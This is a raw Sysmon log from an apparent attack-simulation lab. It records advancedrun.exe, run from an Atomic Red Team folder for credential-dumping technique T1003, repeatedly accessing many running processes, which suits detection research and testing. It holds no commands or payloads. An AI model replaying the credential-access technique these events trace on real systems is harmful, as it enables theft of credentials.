17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 